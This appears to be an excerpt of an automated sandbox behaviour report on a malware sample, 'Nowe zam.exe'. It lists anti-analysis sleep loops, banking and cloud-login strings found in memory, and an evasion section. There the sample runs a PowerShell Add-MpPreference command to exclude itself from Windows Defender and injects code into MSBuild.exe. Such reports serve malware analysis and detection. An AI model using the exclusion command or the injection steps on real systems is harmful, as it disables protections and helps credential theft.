                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599407Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598231Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597907Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594110Jump to behavior
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                  Source: MSBuild.exe, 00000004.00000002.4772141183.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllac
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                  Source: Nowe zam.exe, 00000000.00000002.2339393029.00000000007F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                  Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_065B9328 LdrInitializeThunk,4_2_065B9328
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 444000Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BF9008Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeQueries volume information: C:\Users\user\Desktop\Nowe zam.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
